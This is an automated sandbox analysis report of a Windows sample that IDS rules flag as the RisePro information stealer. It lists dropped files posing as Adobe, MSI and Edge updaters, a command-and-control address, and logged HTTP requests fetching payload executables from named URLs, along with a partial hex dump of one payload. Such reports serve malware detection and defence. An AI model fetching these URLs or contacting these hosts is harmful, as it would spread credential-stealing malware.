Windows Analysis Report
file.exe

AV Detection

Source: https://easy2buy.ae/wp-content/upgrade/k.exe$	Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/upgrade/k.exe	Avira URL Cloud: Label: malware
Source: http://193.233.132.175/server/k/l2.exe	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053

Source: https://easy2buy.ae:80/wp-content/upgrade/k.exe	Virustotal: Detection: 5%			Perma Link
Source: http://193.233.132.175/server/k/l2.exe	Virustotal: Detection: 19%			Perma Link

Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Virustotal: Detection: 80%			Perma Link
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe	ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe	Virustotal: Detection: 80%			Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	Virustotal: Detection: 80%			Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe	Virustotal: Detection: 80%			Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe	Virustotal: Detection: 80%			Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe	Virustotal: Detection: 80%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	Virustotal: Detection: 80%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe	Virustotal: Detection: 80%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe	Virustotal: Detection: 80%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Virustotal: Detection: 80%			Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Virustotal: Detection: 80%			Perma Link

Source: file.exe	ReversingLabs: Detection: 28%
Source: file.exe	Virustotal: Detection: 22%			Perma Link

Cryptography

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00983EB0 CryptUnprotectData,

0_2_00983EB0

Compliance

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49717 version: TLS 1.2

Spreading

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009833B0 CreateDirectoryA,FindFirstFileA,		0_2_009833B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009A3880 FindFirstFileA,GetLastError,CreateDirectoryA,		0_2_009A3880
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F1F8C FindFirstFileExW,GetLastError,		0_2_008F1F8C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F1FAC FindFirstFileExW,		0_2_008F1FAC

Networking

Source: Traffic	Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49706 -> 193.233.132.47:50500
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.5:49706
Source: Traffic	Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.47:50500 -> 192.168.2.5:49706
Source: Traffic	Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49706 -> 193.233.132.47:50500
Source: Traffic	Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49709 -> 193.233.132.175:80
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49706 -> 193.233.132.47:50500
Source: Traffic	Snort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 193.233.132.47:50500 -> 192.168.2.5:49706
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.5:49722

Source: global traffic

TCP traffic: 192.168.2.5:49706 -> 193.233.132.47:50500

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Thu, 25 Apr 2024 14:29:10 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Fri, 19 Apr 2024 15:26:27 GMTConnection: keep-aliveETag: "66228d23-45a2b8"Accept-Ranges: bytesData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d

Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 193.233.132.47 193.233.132.47
Source: Joe Sandbox View	IP Address: 104.26.5.15 104.26.5.15

Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /widget/demo/185.152.66.230 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=185.152.66.230 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.47

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00984EB0 recv,setsockopt,recv,recv,recv,recv,recv,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,Sleep,

0_2_00984EB0

Source: global traffic	HTTP traffic detected: GET /widget/demo/185.152.66.230 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=185.152.66.230 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: db-ip.com
Source: global traffic	DNS traffic detected: DNS query: easy2buy.ae

Source: file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.175/server/k/l2.exe
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr, MSIUpdaterV2.exe0.0.dr, JcZ7W4aCxlpc4pOVLwL1.exe.0.dr, AdobeUpdaterV2.exe0.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr, MSIUpdaterV2.exe0.0.dr, JcZ7W4aCxlpc4pOVLwL1.exe.0.dr, AdobeUpdaterV2.exe0.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr, MSIUpdaterV2.exe0.0.dr, JcZ7W4aCxlpc4pOVLwL1.exe.0.dr, AdobeUpdaterV2.exe0.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000002.4443546402.0000000000A1A000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.4444719572.0000000001475000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3304691476.0000000001474000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=185.152.66.230
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3304591521.000000000147C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444742082.0000000001481000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=185.152.66.230VEY
Source: file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com:443/demo/home.php?s=185.152.66.230P
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4445435690.00000000060E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easy2buy.ae/
Source: file.exe, 00000000.00000002.4445612966.0000000006115000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe$
Source: file.exe, 00000000.00000003.2283281296.0000000006114000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3304638888.0000000006115000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445612966.0000000006115000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000002.4444174900.00000000013E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001418000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3304691476.0000000001474000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.4443546402.0000000000A1A000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: file.exe, 00000000.00000002.4444174900.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/185.152.66.230
Source: file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/185.152.66.230B
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr, MSIUpdaterV2.exe0.0.dr, JcZ7W4aCxlpc4pOVLwL1.exe.0.dr, AdobeUpdaterV2.exe0.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://support.mozilla.org
